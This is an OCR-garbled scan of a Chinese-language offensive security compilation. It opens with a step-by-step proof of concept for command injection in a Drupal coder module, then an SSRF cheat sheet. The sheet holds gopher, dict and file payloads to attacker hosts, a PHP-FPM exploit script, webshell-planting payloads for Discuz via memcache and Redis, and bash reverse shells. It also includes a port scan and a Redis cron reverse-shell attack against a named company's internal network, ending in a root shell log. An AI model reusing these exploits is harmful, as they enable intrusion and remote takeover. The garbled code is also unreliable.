$a = array( 
"upgrades" => array( 
"coder_upgrade" => array( 
"module" => "color", 
"files" => array("color.module") 


Dr 


"variables" -» 1, 
"theme cache" => 1, 
"extensions" -» array("module"), 
"items" => array (array("old dir"z»"test;touch 123;", "new d 
ir"=>"test")), 
"paths" => array( 
"modules base" => "../../../", 
"files base" => "../..", 
"libraries base" => 1 


); 

$payload - serialize($a); 

file get contents($host . "/sites/all/modules/coder/coder upgrad 
e/scripts/coder upgrade.run.php?file-data://text/plain;basee64," 
. base64 encode($payload)); 


2. 接 下 来 ， 我 们 看 coder_ upgrade start $ Zt $5 À WA: 


在 /sites/all/modules/coder/coder_upgrade/includes/main.inc 文 件 中 : 


function coder_upgrade_start($upgrades, $extensions, $items, $re 
cursive = TRUE) { 

// Declare global variables. 

global $ coder upgrade log, $ coder upgrade debug, $ coder upg 
rade module name, $ coder upgrade replace files, $ coder upgrade 
.class files; 


// Check lists in case this function is called apart from form 
submit. 
if (!is array(S$upgrades) || empty($upgrades)) { 

return FALSE; 


} 

if (!is array($extensions) || empty($extensions)) { 
return FALSE; 

} 


if (!is array($items) || empty($items)) { 
return FALSE; 


$ coder upgrade log = TRUE; 
if ($ coder upgrade log) { 
// Clear the log file. 
coder upgrade path clear('10g'); 
if (!variable get('coder upgrade use separate process', FALSE 


DE 


coder_upgrade_path_clear('memory'); 
} 
coder upgrade memory print('initial'); 
} 
// Set debug output preference. 
$ coder upgrade debug = variable get('coder upgrade enable deb 
ug output', FALSE); 
if ($ coder upgrade debug) ( 
// Clear the debug file. 
coder upgrade path clear('debug'); 


// Load code. 
coder upgrade load code($upgrades); //2.1. 我 们 调试 到 此 处 程序 退出 运 
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行 ， 经 分 析 是 因为 包含 文件 出 错 。 这 个 函数 可 理解 为 :require(modules 目 录 .$upgr 
ades[ 'coder_upgrade']['module'].$upgrades[ 'coder_upgrade']['file 
s'][90])， 即 包含 模块 目录 下 的 茶 些 文件 。POC 里 面 的 意思 是 包含 c0lor 模 块 下 的 col0 
r.module 文 件 。 但 是 可 能 还 是 因为 环境 不 同 ， 我们 modules 目 录 下 并 没有 color 这 个 
模块 ， 所 以 我 们 还 是 选择 coder 模 块 本 身 。 

coder_upgrade_load_parser(); 


// Set file replacement parameter. 

$ coder upgrade replace files = variable get('coder upgrade re 
place files', FALSE); 

// Initialize list of class files. 

$ coder upgrade class files - array(); 


// Loop on items. 
foreach ($items as $item) 1 
$ coder upgrade module name = ''; 
// $ coder upgrade dirname = $item['old_dir']; 


if (!isset($ SERVER['HTTP USER AGENT']) || strpos($ SERVER[' 
HTTP USER AGENT'], 'simpletest') --- FALSE) ( 
// Process the directory before conversion routines are ap 
plied. 
// Note: if user agent is not set, then this is being call 
ed from CLI. 
coder upgrade convert begin($item); 


// Call main conversion loop. 

coder upgrade convert dir(S$upgrades, $extensions, $item, $re 
cursive); //2.2, 此 处 是 修改 完 POC 后 另 一 处 退出 运行 的 地 方 ， 也 是 整个 分 析 过 程 比 
较 有 意思 的 地 方 ， 跟 踪 函 数 ( 到 第 3 点 )。 


// Apply finishing touches to the directory. 

// Swap directories if files are replaced. 

$new dir = $ coder upgrade replace files ? $item['old_dir'] 
: $item['new dir']; 

coder upgrade convert end($new dir); 


// Make a patch file. 
coder upgrade make patch file($item, $ coder upgrade replace 
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_files); 
J 


return TRUE; 


Eoo å [Ml 


“2.1 后 ”， 我 们 的 POC 被 修改 为 : 
$host = "http://localhost:82/"; 


$a = array( 
"upgrades" => array( 
"coder_upgrade" => array( 
"module" => "coder", 
"files" => array("coder.module") 


), 
"variables" => 1, 
"theme_cache" => 1, 
"extensions" => array("module"), 
"items" => array (array("old_dir"=>"test; touch 123;", "new d 
ir"=>"test")), 
"paths" => array( 
"modules base" => "../../../", 
“Tiles baset => wl 
"libraries base" => 1 


); 

$payload - serialize($a); 

file get contents($host . "/sites/all/modules/coder/coder upgrad 
e/scripts/coder upgrade.run.php?file-data://text/plain;base64," 
. base64 encode($payload)); 


3. 跟踪 coder upgrade convert dir 函数 : 


function coder upgrade convert dir($upgrades, $extensions, $item 
, $recursive = TRUE) { 
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global $ coder upgrade filename; // Not used by this module, b 
ut other modules may find it useful. 

statici Signore- Ar 1.4 ax po DZ on EDS SU. 7 
D E 

global $ coder upgrade module name, $ coder upgrade replace fi 
les; 


$dirname - $item['old dir']; 
$new dirname - $item['new dir']; 


// Create an output directory we can write to. 
if (!is dir($new dirname)) ( //3.1, 此 处 会 获取 我 们 可 控 的 new_dir， 新 
ZAAK 
mkdir($new dirname); 
chmod($new dirname, 0757); 
} 
else { 
coder_upgrade_clean_directory($new_dirname) ; 
J 
...//ignore 
coder_upgrade_module_name($dirname, $item); //3.2. 此 处 会 Scandir 
($dirname)， 如 果 $dirname 目 录 不 存在 则 会 产生 警告 退出 运行 。dirname 即 POC 里 
的 0ld_dir， 我 们 需要 0]d_dir 为 一 个 已 经 存在 的 目录 ， 但 是 如 果 下 面 程序 会 对 那个 目 
录 下 的 文件 产生 其 它 操 作 ， 可 能 影响 系统 的 正常 功能 。 这 时 我 们 想到 了 上 面 3.1 的 创建 
目录 。 只 需 new_ dirfeold dir 相同 ，Sscandir(o1ld dir) 即 可 正常 运行 ， 还 不 会 影 
响 系统 其 它 文 件 。 
$ coder upgrade module name = $item['module'] ? $item['module' 
] : $ coder upgrade module name; 


// Loop on files. 
$filenames = scandir($dirname . '/');//3.3.3st2# F]3.2 
foreach ($filenames as $filename) { 


$ coder upgrade filename = $dirname . '/' . $filename; 
if (is dir($dirname . '/' . $filename)) { 
if (substr(basename($filename), ©, 1) == '.' || in array(b 


asename($filename), $ignore)) 1 
// Ignore all hidden directories and CVS directory. 
continue; 


} 


$new filename = $filename; 


// Handle D6 conversion item #79. 
if ($filename == 'po') { 
$new_filename = 'translations'; 
} 
if ($recursive) { 
// TODO Fix this!!! 
$new_item = array( 
'name' => $item['name'], 
'old dir' => $dirname . '/' . $filename, 
'new dir' => $new dirname . '/' . $filename, 
); 
coder upgrade convert dir(S$upgrades, $extensions, $new i 
tem, $recursive); 
// Reset the module name. 
$ coder upgrade module name = $item['module']; 


} 
elseif (in _ array($extension = pathinfo($filename, PATHINFO E 


XTENSION), array_keys($extensions))) { 

copy($dirname . '/' . $filename, $new_dirname . '/' . $fil 
ename ); 

if ($extension == 'php' && substr($filename, -8) == '.tpl. 
php') € 

// Exclude template files. 
continue; 

} 

coder_upgrade_log_print ("An ### #22 2 tee A OA AIT) à 

coder upgrade log print('Converting the file => ' . $filen 
ame); 

coder upgrade log print("******xee m) ， 

coder upgrade convert file($dirname . '/' . $filename, $ne 
w dirname . '/' . $filename, $ coder upgrade replace files); 

} 
elseif (in_array($extension, array('inc', ‘install', 'module' 

, 'php', ‘profile’, 'test', 'theme', 'upgrade'))) ( 

copy($dirname . '/' . $filename, $new dirname . '/' . $fil 
ename); 

// Check for a class declaration for use in the info file. 

coder upgrade class check($new dirname . '/' . $filename); 
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else { 
copy($dirname . '/' . $filename, $new_dirname . '/' . $fil 
ename ); 
} 
J 


d ——————————————áÀÀ9 1! 


“3.3 后 ”，POC 修 改 为 : 
$host = "http:/7Ylocalhost:827"; 


$a = array( 
"upgrades" => array( 
"coder_upgrade" => array( 
"module" => "coder", 
"files" => array("coder.module" ) 


), 

"variables" => 1, 

"theme_cache" => 1, 

"extensions" => array("module"), 

"items" => array (array("old_dir"=>"test; touch 123;", "new d 
in'=>"test; touch 1237") ); 

"paths" => array( 

"modules base" => "../../../", 


"files base" z» "../..", 
"libraries base" => 1 


); 

$payload - serialize($a); 

file get contents($host . "/sites/all/modules/coder/coder upgrad 
e/scripts/coder upgrade.run.php?file-data://text/plain;basee64," 


. base64_encode($payload) ); 


REA 280 coder_upgrade_start h žr > se RA] CAAT LR À 
coder_upgrade_make_patch_file2 > T vni coder upgrade make patch file 
数 的 声明 : 


^ a d eae XX 4277 £2 BAST AE N RO N PAUONITPRBIR_ ANIC naO" 
Ol lei IA TA. XY TH 9 Y JAN í] T T (DATU O N | RIB-2 0 | 6-U J Ÿ) 


function coder upgrade make patch file($item, $ coder upgrade re 
place files - FALSE) ( 

// Patch directory. 

$patch dir = coder upgrade directory path('patch'); 


// Make a patch file. 
coder upgrade log D PAM LC NI ANLE ED EE n E EDUC DE 


coder upgrade log print('Creating a patch file for the directo 


ry => ' Sitem[ ‘old dir’ ]5; 
coder upgrade log DID Su ME 
$patch filename = $patch dir . $item['name'] . '.patch'; //4.1 


,此 处 还 有 一 个 $item['name'] 在 POC 里 面 没 有 声明 ， 所 以 程序 到 这 里 还 是 会 退出 运行 
> 所 以 我 们 只 需 最 后 再 修改 下 POC。 

// Swap directories if files are replaced. 

$old dir = $ coder upgrade replace files ? $item['new dir'] 
$item['old dir']; 

$new dir = $ coder upgrade replace files ? $item['old dir'] 
$item['new dir']; 


coder upgrade log print("Making patch file: diff -up -r {$old_ 


dir} {$new dir) > ($patch filename"); 
shell exec("diff -up -r {$old dir) {$new dir) > {$patch_filena 


me}"); 


// Remove the path strings from the patch file (for usability 


purposes). 
$old1 = $old dir . '/'; 
$newl = $new_dir . '/'; 


$contents = file get contents($patch filename); 
file put contents($patch filename, str_replace(array($old1, $n 
ew1), '', $contents)); 


j 


我 们 最 终 POC 为 : 
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$host = "http://localhost:82/"; 


$a = array( 
"upgrades" => array( 
"coder_upgrade" => array( 
"module" => "coder", 
"files" => array("coder.module" ) 


), 
"variables" => 1, 
"theme_cache" => 1, 
"extensions" => array("module"), 
"items" => array (array("old_dir"=>"test; touch 123;", "new d 
ir"=>"test;touch 123;", "name"=>1)), 
"paths" => array( 
"modules base" => "../../../", 
"files base" =>... 
"libraries base" => 1 


); 

$payload = serialize($a); 

file_get_contents($host . "/sites/all/modules/coder/coder_upgrad 
e/scripts/coder upgrade.run.php?file-data://text/plain;basee64," 
. base64 encode($payload)); 


123 


SSRF 


SSRF Tips 
SSRF PHP function 


file get contents() 
fsockopen() 
curl exec() 


URL schema support 


SFTP 


http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/ 


evil.com:$ nc -v -1 11111 

Connection from [192.168.0.10] port 11111 [tcp/*] accepted (fami 
ly 2, sport 36136) 

SSH-2.0-libssh2 1.4.2 


Dict 


http://0cx.cc/ssrf.php?dict://attacker:11111/ 


evil.com:$ nc -v -1 11111 

Connection from [192.168.0.10] port 11111 [tcp/*] accepted (fami 
ly 2, sport 36136) 

CLIENT libcurl 7.40.0 


gopher 


// http://0cx.cc/ssrf.php?url=http://evil.com/gopher.php 
<?php 


header('Location: gopher://evil.com:12346/ HI%OAMultilin 


e%0Atest'); 
?> 


evil.com:# nc -v -1 12346 
Listening on [0.0.0.0] (family 0, port 12346) 


Connection from [192.168.0.10] port 12346 [tcp/*] accepted (fami 


ly 2, sport 49398) 
HI 

Multiline 

test 


TFTP 


http://0cx.cc/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET 


evil.com:# nc -v -u -1 12346 
Listening on [0.0.0.0] (family 0, port 12346) 
TESTUDPPACKEToOctettsizeOblksize512timeout6 


file 


http://0cx.cc/redirect.php?url=file:///etc/passwd 


Idap 


http://0cx.cc/redirect.php?url=ldap://localhost:11211/%0astats%0 


aquit 


PHP-FPM 


PHP-FPM universal SSRF bypass safe mode/disabled functions/o exp 


SSRF Tips 


#!/usr/bin/ruby 


# 


coding: ASCII-8BIT 


# Exploit Title: PHP-FPM universal SSRF bypass safe_mode/disable 
d_functions/open_basedir/etc 


# redefine any php.ini values, not specified in php_admin_value 


# 


SSRF - Server Side Request Forgery 


# additional info about techinuque: http://www.slideshare.net/d0 


znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities 


dk dk db Gb dk Gb Gb H 


Google Dork: not relevant 

Date: 21/11/12 

Exploit Author: QONsec lab http://lab.onsec.ru 
Vendor Homepage: php.net fastcgi.com 

Software Link: php-fpm.org 

Version: all 

Tested on: all 

CVE : not a vuln (bug by design) 


require 'socket' 


require 'base64' 


class FCGIRecord 


( 


class BeginRequest « FCGIRecord 
def initialize( id) 
Qid = id 
Qtype = 1 
@data = "\x00\x01\x00\x00\x00\x00\x00\x00" 
end 
end 


class Params < FCGIRecord 
def initialize( id, params = {}) 
@id = id 
@type = 4 
@data = "" 
params.each do |k,v| 


@data << [ k.to_s.length, (1<<31) | v.to s.length ].pack 


NEN KET 


127 


@data << k.to_s 
@data << v.to_s 
end 
end 
end 


def initialize( id, type) 
@id = id 
@type = type 
@data = "" 

end 


def to_s 
packet = "\x01%c%c%c%c%c%c\x00" % [ 
type, 
Jd / 256, 101% 256, 
data.length / 256, data.length % 256, 
data.length 96 8 
] 
packet «« data 
packet «« "Xx00" * (data.length % 8) 
end 


private 
attr reader :id, :type, :data 
end 


if ARGV.count « 3 or ARGV.count » 4 
STDERR.write "Usage: #{$0} ( -u /path/to/socket | addr port ) 
[ /path/to/any/exists/file.php ] 'some php code to execute'\n" 
exit 1 
end 


script - ARGV.count -- 4 ? ARGV[2] : "/usr/share/php/PEAR. php" 
command = Base64.encode64(ARGV.last.strip).strip.gsub( '-', '%3d' 
)sgsub( "7. Map) 


SSRF Tips 


packet = "" 
packet << FCGIRecord::BeginRequest.new( 1).to_s 
packet << FCGIRecord::Params.new( 1, 
"SERVER_NAME" => "localhost", 
"REQUEST_METHOD" => "GET", 
"SCRIPT_FILENAME" => script, 
"PHP_ADMIN_VALUE" => [ 
"allow_url_fopen=0n", 
"allow url include-On", 
"disable functions-Off", 
"open basedir-Off", 
"display errors-On", 
"safe mode-Off", 
"short open tag-On", 
"auto prepend file-data:,96 
3c?63f9?6020eval?628base64 decode9:289:22::( command )962 2962 9962 9963 f ?63 e " 
],. join( "\n") 
) tofs 
packet << FCGIRecord::Params.new( 1).to_s 
packet << FCGIRecord.new( 1, 5).to_s 


#print packet.split('').map{ |c] '\x%02x' % c[0].ord }.join 


fcgisock = ARGV[0] == '-u' ? UNIXSocket.new( ARGV[1]) : TCPSocke 
t.new( ARGV[9], ARGV[i]) 
fcgisock.write( packet) 


puts fcgisock.read 
pn——Á——— Á—— 34 | 
SSRF memcache Getshell 
Generate serialize 

«?php 


$code=array('global_start'=>'@eval($_REQUEST[\'eval\']);'); 
echo serialize($code)."\n".strlen(serialize($code) ); 


NO 


Output 


a:i:{s:12:"global_start";s:25:"@eval($_REQUEST['eval']);";} ///f 
列 化 数据 
59 // 字 符 串 长 度 


webshell.php 


<?php 
//gopher 可 以 换 成 如 上 其 它 方式 

header('Location: gopher://[target ip]:11211/ %0d%oaset ssrf 
test 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"se 
arch";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ 
cccl)) }}s:132 7rewritestatus- 1:1; 960095928) 
?> 


back.php 


<?php 
header('Location: gopher://192.168.10.12:11211/_%0d%0adelete 


ssrftest%od%0a'); 
?> 


example Discuz 


open the website 
http://bbs.Ocx.cc/forum.php?mod-zajax&action-downremoteimg&messag 
e-[img]http://myvps/webshell.php?logo.jpg[/img] 


http://bbs.Ocx.cc/forum.php?mod-zajax&inajax-yes&action-getthread 
types 


clear data 


http://bbs.Ocx.cc/forum.php?mod-zajax&action-downremoteimg&messag 
e=[img]http://myserver/back.php?logo. jpg[/img ] 


backdoor url 


http://bbs.Ocx.cc/data/cache/hello.php 


SSRF Redis Getshell 


Generate serialize 


«?php 
$a['output']['preg']['search']['plugins'] = '/.*/e'; 
$a['output']['preg']['replace']['plugins'] = 'Qeval($ POST['c 
Mie 
$a['rewritestatus']-1; 
$setting = serialize($a); 
echo $setting."\n".strlen($setting); 


E à 


Output 


462-556 -AOULDUL à fs A pred a 215 G-"Searchi à. dot oy: pl 
ügins" :s:5:" 7. fe ts: 7:"replace':a:1:[s.7: "plugins ;s:19: Qeval 


(S POST CD Kk Iysraat rewritestatus ll // 序 列 化 数据 
173 // 字 符 串 长 度 


example Discuz 


Open website 
http://192.168.80.116/forum. php?mod=aj ax&action=downremoteimg&me 


ssage=[img=1,1]http://you-vps-ip/ssrf.php?.jpg[/img ]&formhash=81 
8c8f44 


Backdoor website 


http://192.168.80.116/forum.php?mod-ajax&inajax-yes&action-getth 
readtypes 


FFmpeg 


cat test.jpg 


HEXTM3U 


HEXT -X-MEDIA - SEQUENCE : 0 


C» 


XTINF:10.0 


concat:http://example.org/header.m3u8|file:///etc/passwd 











HEXT -X- ENDLIST 

subfile 

HEXTM3U 

HEXT -X-MEDIA-SEQUENCE : 0 
HEXTINF :10.0 


concat:http://localhost/header .m3u8|subfile,,start,0,end,64,,:// 
/etc/passwdconcat:http://localhost/header .m3u8|subfile,,start, 64 
, end, 128, , :///etc/passwdconcat:http://localhost/header.m3u8|subf 
ile,,start,128,end,256,,:///etc/passwdconcat:http://localhost/he 
ader .m3u8|subfile,,start, 256,end,512,, :///etc/passwd 


#EXT -X-ENDLIST 


PostgreSQL 


Exploit 


> SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\n 
stats\n\' password=1 port=11211 sslmode=disable', 'select 
version();'); 


MongoDB 


Exploit 


> db.copyDatabase("\1\2\3\4\5\6\7", 'test', ' localhost:8000') 
> nc -1 8000 | hexdump -C 
> db.copyDatabase(“\nstats\nquit”, ‘test’, ’localhost:11211’ ) 


CouchDB 


exploit 


http://localhost:5984/ users/ all docs 


HTTP/1.1 200 OK 

Server: CouchDB/1.2.0 (Erlang OTP/R15B01) 
ETag: "BD1WV12007V05JTGA4X6YHIHCA" 

Date: Tue, 18 Dec 2012 21:39:59 GMT 
Content-Type: text/plain; charset-utf-8 
Cache-Control: must-revalidate 


("total rows":1, "offset":0, rows":[ 

{"id":" design/ auth","key":" design/ auth","value":["rev":"1-a8 
cfb993654bcc635f126724d39eb930" Y 

1} 

Attacker could also send requests from CouchDB server to intrane 
t by using replication function 


POST http://couchdb:5984/_replicate 
Content-Type: application/json 
Accept: application/json 


{ 
"source" "recipes", 
"target" : "http://ssrf-me:11211/recipes", 
} 
Jboss 
Jbosss POC 


/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:servi 
ce-MainDeployer&methodIndex-17&argO0-http://our public internet s 
erver/utils/cmd.war 


写 入 Shell 


http://target.com/ueditor/jsp/getRemotelmage.jsp 

POST: 
upfile=http://10.0.0.1:8080/jmx-console/HtmlAdaptor?action=invok 
e0p%26name=jboss.system%3Aservice%3DMainDeployer%26methodIndex=3 
%26arg9=http%3A%2F%2F 远 端 地 址 62Fhtm15.war%23.jpg 


http://target.com/ueditor/jsp/getRemotelmage.jsp 
POST: 
upfile=http://A MIP: 8080/htm15/023.jsp%23.jpg 


reverse shell 


bash -i >& /dev/tcp/123.45.67.89/9999 O>&1 


Weblogic 
gopher.php 


<?php 
header ("Location: gopher ://vps-ip:2333/_test"); 
?> 


vuln website 


https://example.com/uddiexplorer/SearchPublicRegistries.jsp 
POST: 
operator=http://vps-ip/gopher . php&rdoSearch=name&t xtSearchname=s 
df&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmi 
t=Search 

vps 


> nc -lvv 2333 
Connection from xx.xx.xx.xx port 2333 [tcp/snapp] accepted 


Local File Read 


http://www.xxx.com/redirect.php?url=file:///etc/passwd 
http://www.xxx.com/redirect.php?url=file:///C:/Windows/win. ini 


Bool SSRF 


Struts2-016 POC 


?redirect :${%23a%3d(new%20java.lang.ProcessBuilder (new%20java.la 
ng.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%2 
3c%3dnew%20java.io.InputStreamReader (%23b) ,%23d%3dnew%20java.io. 
BufferedReader (%23c) ,%23t%3d%23d.readLine(),%23u%3d"http://SERVE 
R/result%3d".concat(%23t 1. %23http%3dnew%20java.net.URL(%23uU).ope 
nConnection(),%23http.setRequestMethod("GET"),%23http.connect(), 
%23http.getInputStream()} 


/修改 SERVER 为 你 vps 地 址 ,返回 结果 在 access.log 中 查看 


SSRF Proxy 


SSRF_Proxy 


https://github.com/bcoles/ssrf proxy 


ssrfsocks 


https://github.com/iamultra/ssrfsocks 


‘KRHA SSRF A(T À À SHELL 附 多 线程 
Fuzz A) 


1 存在 漏洞 位 置 ，Discuz À XSSRF À A 


http://www.miui.com/forum.php?mod=ajax&action=downremoteimg&message= 
[img]http://fuzz.wuyun.com/302.php?data-helo.jpg[/img] 


2 服务 器 支持 dict、ftp、http 协 议 


http://www.miui.com/forum.php?mod=ajax&action=downremoteimg&message= 
[img]http://fuzz.wuyun.com/302.php? 
s=dict%26ip=fuzz.wuyun.com%26port=8080%26data=helo.jpg[/img] 


3 通过 信息 泄露 找到 内 网 地 址 
phpinfo() 泄露 服务 器 ip 地 址 http://game.xiaomi.com/activity/info.php 


__SERVERT "SERVER_ADDR"] 10.105.44.71 

.SERVER["SERVER PORT"] 8080 

_SERVER[ "SERVER_NAME" ] g.mi.com 

_SERVER["REDIRECT_STATUS"] 200 

_SERVER[ "SCRIPT_FILENAME" ] /home/work/game.xiaomi.com/activit 
y/info.php 

_SERVER["HTTP_HOST" ] game .xiaomi.com 


SERVER CONIENI, LENGIH] 
SERVER['SCRIPT_NAME"] 
SERVER["REQUEST_URI"] 
SERVER["DOCUMENT_URI"] 
SSERVER['DOCUMENT ROOT7 
.SSERVER['SERVER PROTOCOL 
SERVER["GATEWAY_INTERFACE’] 
SERVER['"SERVER_SOFTWARE’] 
SERVER["REMOTE_ADDR’] 
.SERVER['REMOTE PORT] 
.SERVER['SERVER ADDR"] 
.SERVER['SERVER PORT) 
.SSERVER['SERVER NAME" 
.SERVER['REDIRECT. STATUS" 
SSERVER['SCRIPT. FILENAME] 
SSERVER['HTTP. HOST'] 
SSERVER['HTTP. CONNECTION'] 
.SERVER['HTTP. ACCEPT" 


no vaiue 
/activity/info.php 
/activity/info.php 
/activity/info.php 
/home/work/game.xiaomi.com 
HTTP/1.1 
CGI/1.1 


nginx/1.4.7 


533 dd 
10.105.44.71 
8080 
g.mi.com 
200 













/nome/work/game.xiaomi.com/activity/info.php 


game.xiaomi.com 
keep-alive 


text/html,application/xhtml+xml,apaligati 


PX IPR HIL TT LIR A PNP INICrImr AreNiireren a 


4 内 网 服务 探测 规则 原理 分 析 


http://fuzz.wuyun.com/302.php?url=dict://10.105.44.71:8080 


访问 存在 开放 的 8080 端 口 ， 网 页 在 1S 内 加 载 完成 


http://fuzz.wuyun.com/302.php?url=ftp://10.105.44.71:8080 


Q 
O 


» 


xmas 


利用 ftp 协 议 访问 开放 的 8080 端 口 ， 网 页 保持 Keep-Alive 状 态 ， 直 到 出 发 nginx 的 超 


时 


http://fuzz.wuyun.com/302.php?url=dict://10.105.44.71:11011 


访问 不 存在 的 端口 11011， 触 发 了 小 米 nginx 的 超时 , 3.1s 内 加 载 完 成 也 就 是 说 ， 我 
们 可 以 通过 页 面 加 载 完 成 时 间 ， 来 探测 内 网 开放 的 端口 服务 


5 Know it, then Hack it 


通过 python 的 requests， 设 置 一 个 timeout 值 ， 只 要 http 请 求 2.8 秒 内 没有 响应 ， 直 接 


断 开 ， 如 果 成 功 响 应 ， 就 说 明 端 口 开放 


#!/usr/bin/env python 
# encoding: utf-8 
4 email: ringzero@0x557.org 
import requests 
import time 
import requests.packages.urllib3 
requests.packages.urllib3.disable warnings() 
import threading 
import Queue 
threads count - 20 
scheme - 'dict' 
port = '6379' 
ip block - '10.105' 
class WyWorker(threading.Thread): 
def — init (self,queue): 
threading.Thread. init (self) 
self.queue - queue 
def run(self): 
while True: 
if self.queue.empty(): 
break 
IBI WE 
url - self.queue.get nowait() 
content = requests.get(url, timeout=2.8).content 
print url, 'OPEN', len(content) 
except requests.exceptions.ReadTimeout: 
pass 
except requests.exceptions.ConnectTimeout: 
pass 
except Exception, e: 
break 
queue = Queue. Queue( ) 
for C in xrange(0, 255): 
for d in xrange(0, 255): 
ip = '{0}.{1}.{2}'.format(ip_block,c,d) 
payload = 'http://fuzz.wuyun.com/302.php?s={scheme }%26ip 
={ip}%26port={port}%26data=helo.jpg'.format ( 
scheme=scheme, 


ip=ip, 


port=port 
) 
url = "http://www.miui.com/forum.php?mod-ajax&action-dow 
nremoteimg&message=[ img] {payload}[/img]".format ( 
payload=payload) 
queue.put(url) 
threads = [] 
for i in xrange(threads count ): 
threads .append(WyWorker(queue)) 
for t in threads: 
t.start() 
for t in threads: 
t.join() 


6 6379 端口 开放 结果 


lg-sec-weblog01.bj (10.105.0.23) 
1g-miui-ad-se51.bj (10.105.0.24) 
lg-im-micloud-pns09.bj (10.105.3.60) 
lg-im-micloud-pns10.bj (10.105.3.61) 
lg-im-mipush-xmq74.bj (10.105.3.62) 
lg-miui-fc-mr02.bj (10.105.3.80) 


7 使 用 dict 协 议 进 行 远程 利用 


#!/usr/bin/env python 
# coding=utf -8 

import requests 

host = 10:105:20:23! 
port = '6379' 


bhost = 'fuzz.wuyun.com' 
bport = '443' 
vul httpurl = 'http://www.miui.com/forum. php?mod=ajax&act ion=dow 


nremoteimg&message=[img]' 

location = 'http://fuzz.wuyun.com/302.php' 

shell location - 'http://fuzz.wuyun.com/shell.php' 
41 flush db 


payload = '?s=dict%26ip={host }%26port={port}%26data=flushall'.f 
ormat ( 
host = host, 
port = port) 
exp uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_locatio 
n, payload, vul_httpurl=vul httpurl) 
print exp uri 
print len(requests.get(exp uri).content) 
#2 set crontab command 
payload = '?s=dict%26ip={host }%26port={port}%26bhost={bhost}%26 
bport={bport}'.format ( 
host = host, 
port = port, 
bhost = bhost, 
bport = bport) 
exp uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(shell_lo 
cation, _payload, vul httpurl-vul httpurl) 
print exp uri 
print len(requests.get(exp uri).content) 
43 config set dir /var/spool/cron/ 
payload = '?s=dict%26ip={host }%26port={port}%26data=config:set: 
dir:/var/spool/cron/' . format ( 
host = host, 
port = port) 
exp uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_locatio 
n, payload, vul_httpurl=vul httpurl) 
print exp uri 
print len(requests.get(exp uri).content) 
44 config set dbfilename root 
payload = '?s=dict%26ip={host }%26port={port}%26data=config:set: 
dbfilename:root'.format( 
host = host, 
port = port) 
exp uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_locatio 
n, payload, vul_httpurl=vul httpurl) 
print exp uri 
print len(requests.get(exp uri).content) 
45 save to file 
payload = '?s=dict%26ip={host }%26port={port}%26data=save'.forma 
t( 


host = host, 
port = port) 
exp uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_locatio 
n, payload, vul_httpurl=vul httpurl) 
print exp uri 
print len(requests.get(exp uri).content) 


附加 补充 源码 
302.php 


<?php 

$ip = $ GET['ip']; 

$port = $ GET['port']; 

$scheme = $ GET['s']; 

$data - $ GET['data']; 

header("Location: $scheme://$ip:$port/$data"); 
?» 


shell.php 


«?php 

$ip - $ GET['ip']; 

$port - $ GET['port']; 

$bhost - $ GET['bhost']; 

$bport - $ GET['bport']; 

$scheme - $ GET['s']; 

header("Location: $scheme://$ip:$port/set:0:\"\\xOa\\x0a*/1\\x20 
*\\xX20*\\x20*\\x20*\\x20/bin/bash\\x20-1\\x20>\\x26\\x20/dev/tcp 
/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\""); 

?> 


后 话 ， 成 功 获取 到 SHELL 


[root@localhost wyssrf]# nc -1 -vv 443 
Connection from 42.62.103.30 port 443 [tcp/https] accepted 
bash: no job control in this shell 


[root@lg-sec-weblog01 ~]# id 


id 


uid-O(root) gid=0(root) groups=0(root) 
[root@lg-sec-weblog01 ~]# /sbin/ifconi 


/sbin/ifconfig -a 


etho Link encap:Ethernet HWaddr EC:F4:BB:C3:EA:10 
inet addr:10.105.0.23 Bcast:10.105.0.255 Mask:255-25 
5.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:111088533 errors:0 dropped:0 overruns:0 fra 
me : 0 
TX packets:158878520 errors:0 dropped:0 overruns:0 car 
rier:0 
collisions:0 txqueuelen:1000 
RX bytes:45520794026 (42.3 GiB) TX bytes:196616141142 
(183.1 GiB) 
Memory : dch00000 -dcc00000 
eth1 Link encap:Ethernet HWaddr EC:F4:BB:C3:EA:11 
BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) 
Memory : dcc00000 - dcd00000 
eth2 Link encap:Ethernet HWaddr EC:F4:BB:C3:EA:12 
BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) 
Memory : dcd00000 - dce00000 
eth3 Link encap:Ethernet HWaddr EC:F4:BB:C3:EA:13 
BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) 
Memory : dce00000 - dcf 00000 
lo Link encap:Local Loopback 


inet addr:127.0.0.1 Mask:255.0.0.0 


UP LOOPBACK RUNNING MTU:16436 Metric: 1 
RX packets: 75857851 errors:0 dropped:0 overruns:0 fram 


e:0 
TX packets: 75857851 errors:0 dropped:0 overruns:0 carr 
ier:0 
collisions:0 txqueuelen:0 
RX bytes:76991909461 (71.7 GiB) TX bytes:76991909461 
(71.7 GiB) 
[root@lg-sec-weblog01 ~]# las 20 
last -20 
